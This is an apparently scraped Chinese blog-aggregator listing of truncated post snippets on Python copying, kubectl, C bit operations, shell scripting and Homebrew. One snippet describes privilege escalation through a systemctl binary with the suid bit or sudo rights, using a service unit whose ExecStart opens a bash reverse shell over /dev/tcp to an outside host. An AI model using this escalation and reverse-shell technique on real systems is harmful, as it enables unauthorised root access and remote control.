1 #!/usr/bin/python 2 # -*-coding:utf-8 -*- 3 4 import copy 5 a = [1, 2, 3, 4, ['a', 'b']] #原始对象 6 7 b = a #赋值,传对象的引用 8 c = copy.copy(a) #对象拷贝,浅拷贝 9 d ...
分类:
编程语言 时间:
2021-05-24 15:30:25
阅读次数:
0
当systemctl具备suid位或sudo权限时,可以用来进行提权。 一、首先编写一个service unit用来被systemctl加载 echo '[Service] Type=oneshot ExecStart=/bin/bash -c "/bin/bash -i > /dev/tcp/x. ...
分类:
其他好文 时间:
2021-05-24 14:55:34
阅读次数:
0
1. 登录 kubectl get pods kubectl exec -it onedata-oracle-795d6c558b-b2cqj /bin/bash sqlplus /nolug connect / as sysdba 2. 用户账号 创建: create user onedata i ...
分类:
数据库 时间:
2021-05-24 14:53:10
阅读次数:
0
c语言中按位逻辑运算符、位移运算符 #include <stdio.h> int count_bits(unsigned x) { int bits = 0; while(x) { if(x & 1U) bits++; x >>= 1; } return bits; } int int_bits(v ...
分类:
编程语言 时间:
2021-05-24 14:41:08
阅读次数:
0
1 idea File 》 Settings 》Editor 》File Endcoding 》 UTF-8 2 idea 》 Edit Configuration tomcat Server 》VM options 》-Dfile.encoding=UTF-8 3 tomcat\conf 》log ...
分类:
其他好文 时间:
2021-05-24 14:24:24
阅读次数:
0
在我们日常运维中,写脚本监控一个进程是比较常见的操作,比如我要监控mysql进程是否消失,如果消失就重启mysql。 用下面这段代码就可以实现: #!/bin/sh Date=` date ‘+%c’` while : do if ! ps aux | grep -w mysqld | grep - ...
分类:
系统相关 时间:
2021-05-24 14:22:35
阅读次数:
0
硬件启动方式选择 怎么支持多种启动方式的? 参考手册 启动方式 BOOT_MODE0 BOOT_MODE1 由2个引脚控制;串行启动和boot rom启动 启动设备 sd卡 nand flash nor flash (基本上不用了) emmc spi flash 启动头文件(led灯bin文件头部信 ...
分类:
其他好文 时间:
2021-05-24 14:01:01
阅读次数:
0
安装 javaee jdk mysql apache ideaIU shell编程 x.sh脚本 格式要求: 1.脚本以#!/bin/bash开头 2.脚本要有可执行权限 vim hello.sh 写上: #!/bin/bash echo "hello,world" 保存退出 sh hello.sh ...
分类:
系统相关 时间:
2021-05-24 13:41:21
阅读次数:
0
1.打开终端(terminal) 2.安装命令: 命令1:/usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"(这个命令不好使会报错,如果报错尝试使用命令2 ...
分类:
系统相关 时间:
2021-05-24 13:26:49
阅读次数:
0
给定K个整数组成的序列{ N?1??, N?2??, ..., N?K?? },“连续子列”被定义为{ N?i??, N?i+1??, ..., N?j?? },其中 1≤i≤j≤K。“最大子列和”则被定义为所有连续子列元素的和中最大者。例如给定序列{ -2, 11, -4, 13, -5, -2 ...
分类:
其他好文 时间:
2021-05-24 12:47:25
阅读次数:
0